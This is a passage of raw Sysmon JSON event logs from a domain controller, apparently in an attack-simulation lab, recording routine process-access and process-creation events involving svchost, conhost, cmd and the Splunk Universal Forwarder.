07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2095,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2096,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2097,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2098,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2099,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2100,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-00106EF20300}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-00106EF20300}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2101,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.094\r\nProcessGuid: {41C8662E-1F78-5F25-0000-00102FF30300}\r\nProcessId: 4004\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1F78-5F25-0000-00106EF20300}\r\nParentProcessId: 2520\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.094","ProcessGuid":"{41C8662E-1F78-5F25-0000-00102FF30300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1F78-5F25-0000-00106EF20300}","ParentProcessId":"2520","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2102,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F78-5F25-0000-00106EF20300}\r\nSourceProcessId: 2520\r\nSourceThreadId: 2436\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010C97B0300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.080","SourceProcessGUID":"{41C8662E-1F78-5F25-0000-00106EF20300}","SourceProcessId":"2520","SourceThreadId":"2436","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010C97B0300}","TargetProcessId":"4004","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2103,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.080\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010C97B0300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Program 